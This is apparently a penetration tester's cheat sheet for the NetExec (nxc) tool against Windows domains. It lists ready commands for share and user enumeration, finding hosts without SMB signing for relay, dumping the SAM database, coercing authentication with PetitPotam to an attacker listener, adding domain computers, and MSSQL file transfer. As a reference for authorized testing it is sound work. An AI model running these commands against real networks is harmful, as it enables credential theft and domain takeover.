netexec (nxc)
nxc "is a network service exploitation tool that helps automate assessing the security of large networks."
Basic SMB auth
nxc smb somehost -u user -p 'Winter2027!'
Basic SMB auth (Kerberos)
I like to use getTGT, then export KRB5CCNAME=user.ccache and then here are some enumeration examples:
# Enumerate domain users
nxc ldap domain.com --use-kcache --kdcHost domain.com --users
Turn on logging
To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:
log_mode = True
Change the Pwn3d label
You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:
pwn3d_label = Compromised!
Find shares
nxc smb pcs.txt -u 'username' -p 'password' --shares
Find only shares with READ or WRITE access
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE
Filtering shares
If you want to find just READ/WRITE shares for example:
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares READ WRITE
Or just WRITE:
nxc smb pcs.txt -u 'username' -p 'password' --shares --filter-shares WRITE
Cleaning up share list from log file
If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.
grep -i write log_2024-08-24-22-17-32.log | awk '{print $9,$10}' | sort > shares-i-can-write-to.txt
Find hosts with/without SMB signing
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt
Find hosts with/without SMB signing (alternate way)
grep for anything where signing is set to false
nxc smb pcs.txt -u '' -p '' > signingcheck.txt
If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:
cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txt
Find hosts running WebClient service
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav
Find pre-created computer accounts
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k
Dump SAM database
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam
Coerce authentication
The nxc wiki has an interesting page on this - talking about the various ways nxc can coerce authentication.
Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.
This also applies to the names of the vulnerabilities when specifying a method.
M=p // Invalid, as both petitpotam and printerbug start with ‘p’ so modules gives error
M=pr // Matches printerbug
M=pe // Matches petitpotam
M=dfs // Matches dfscoerce
Coerce via PetitPotam:
nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe
Add computer to the domain
nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!
MSSQL commands
Lifted from the nxc wiki
Execute database commands
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
Get/put files
Get:
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file..txt /tmp/file
Put:
nxc 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt